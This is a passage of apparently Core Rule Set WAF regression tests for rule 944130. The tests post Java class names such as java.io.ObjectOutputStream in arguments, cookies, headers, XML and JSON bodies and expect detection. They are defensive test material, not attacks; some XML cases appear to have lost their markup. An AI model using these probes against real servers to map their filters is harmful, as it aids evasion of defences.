"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + 
data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Request header test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML 
element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Argument test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-172 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + 
desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-176 + desc: "Argument test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-177 + desc: "Argument name includes keyword 
java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-178 + desc: "Cookie test includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-179 + desc: "Cookie name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-180 + desc: "Request header test includes keyword java.io.ObjectOutputStream" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-181 + desc: "XML attribute value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-182 + desc: "XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-183 + desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-184 + desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-185 + desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-186 + desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-187 + desc: "Argument test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-188 + desc: "Argument name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-189 + desc: "Cookie test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-190 + desc: "Cookie name includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-191 + desc: "Request header test includes keyword java.io.OutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 